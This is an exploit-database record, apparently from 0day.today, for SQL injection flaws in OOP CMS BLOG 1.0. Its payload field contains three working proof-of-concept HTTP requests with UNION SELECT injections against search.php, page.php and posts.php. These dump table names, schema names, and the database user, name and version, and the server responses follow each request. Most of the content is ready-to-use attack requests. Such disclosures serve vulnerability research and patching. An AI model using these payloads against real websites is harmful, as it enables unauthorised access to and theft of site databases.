Description
Exploit for the PHP platform, in the web applications category
{"id": "1337DAY-ID-31548", "type": "zdt", "bulletinFamily": "exploit", "title": "OOP CMS BLOG 1.0 - search SQL Injection Vulnerability", "description": "Exploit for php platform in category web applications", "published": "2018-11-07T00:00:00", "modified": "2018-11-07T00:00:00", "cvss": {"score": 0.0, "vector": "NONE"}, "cvss2": {}, "cvss3": {}, "href": "https://0day.today/exploit/description/31548", "reporter": "Ihsan Sencan", "references": [], "cvelist": [], "immutableFields": [], "lastseen": "2018-11-07T22:58:12", "viewCount": 296, "enchantments": {"score": {"value": 7.1, "vector": "NONE"}, "dependencies": {}, "backreferences": {"references": [{"type": "threatpost", "idList": ["THREATPOST:5D5241707AB76ED799696E37D048872A", "THREATPOST:7876640D5EC3E8FE3FE885606BBB1C6D"]}]}, "exploitation": null, "vulnersScore": 7.1}, "sourceHref": "https://0day.today/exploit/31548", "sourceData": "# Exploit Title: OOP CMS BLOG 1.0 - 'search' SQL Injection\r\n# Exploit Author: Ihsan Sencan\r\n# Vendor Homepage: http://zsoft.com.bd/\r\n# Software Link: https://datapacket.dl.sourceforge.net/project/php-oop-cms-blog/blog_fo_rup.zip\r\n# Version: 1.0\r\n# Category: Webapps\r\n# Tested on: WiN7_x64/KaLiLinuX_x64\r\n# CVE: N/A\r\n \r\n# POC: \r\n# 1)\r\n# http://localhost/[PATH]/search.php?search=[SQL]\r\n# \r\nGET /[PATH]/search.php?search=Efe%27%20%20UNION%20SELECT%201,2,(SELECT(@x)FROM(SELECT(@x:=0x00),(@NR:=0),(SELECT(0)FROM(INFORMATION_SCHEMA.TABLES)WHERE(TABLE_SCHEMA!=0x696e666f726d6174696f6e5f736368656d61)AND(0x00)IN(@x:=CONCAT(@x,LPAD(@NR:[email\u00a0protected]%2b1,4,0x30),0x3a20,table_name,0x3c62723e))))x),4,5,6,7,8,9--%20- HTTP/1.1\r\nHost: TARGET\r\nUser-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0\r\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\nAccept-Language: en-US,en;q=0.5\r\nAccept-Encoding: gzip, deflate\r\nConnection: keep-alive\r\nHTTP/1.1 200 OK\r\nDate: Tue, 06 Nov 2018 20:31:15 GMT\r\nServer: 
Apache/2.4.25 (Win32) OpenSSL/1.0.2j PHP/5.6.30\r\nX-Powered-By: PHP/5.6.30\r\nKeep-Alive: timeout=5, max=100\r\nConnection: Keep-Alive\r\nTransfer-Encoding: chunked\r\nContent-Type: text/html; charset=UTF-8\r\n \r\n# POC: \r\n# 2)\r\n# http://localhost/[PATH]/page.php?pageid=[SQL]\r\n# \r\nGET /[PATH]/page.php?pageid=8%20%20UNION(SELECT%20%28%31%29,%28%32%29,(SELECT%20GROUP_CONCAT(schema_name%20SEPARATOR%200x3c62723e)%20FROM%20INFORMATION_SCHEMA.SCHEMATA))--%20- HTTP/1.1\r\nHost: TARGET\r\nUser-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0\r\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\nAccept-Language: en-US,en;q=0.5\r\nAccept-Encoding: gzip, deflate\r\nConnection: keep-alive\r\nHTTP/1.1 200 OK\r\nDate: Tue, 06 Nov 2018 20:33:44 GMT\r\nServer: Apache/2.4.25 (Win32) OpenSSL/1.0.2j PHP/5.6.30\r\nX-Powered-By: PHP/5.6.30\r\nKeep-Alive: timeout=5, max=100\r\nConnection: Keep-Alive\r\nTransfer-Encoding: chunked\r\nContent-Type: text/html; charset=UTF-8\r\n \r\n# POC: \r\n# 3)\r\n# http://localhost/[PATH]/posts.php?id=[SQL]\r\n# \r\nGET /[PATH]/posts.php?id=3%27++UNION+SELECT+1,2,CONCAT_WS(0x203a20,USER(),DATABASE(),VERSION()),4,5,6,7,8,9--+- HTTP/1.1\r\nHost: TARGET\r\nUser-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0\r\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\nAccept-Language: en-US,en;q=0.5\r\nAccept-Encoding: gzip, deflate\r\nConnection: keep-alive\r\nHTTP/1.1 200 OK\r\nDate: Tue, 06 Nov 2018 20:35:57 GMT\r\nServer: Apache/2.4.25 (Win32) OpenSSL/1.0.2j PHP/5.6.30\r\nX-Powered-By: PHP/5.6.30\r\nContent-Length: 3732\r\nKeep-Alive: timeout=5, max=100\r\nConnection: Keep-Alive\r\nContent-Type: text/html; charset=UTF-8\n\n# 0day.today [2018-11-07] #", "_state": {"dependencies": 1647589307, "score": 1683995972, "epss": 1678871604}, "_internal": {"score_hash": "219cba2e57542b510e0ff7639eeaa56a"}}
{}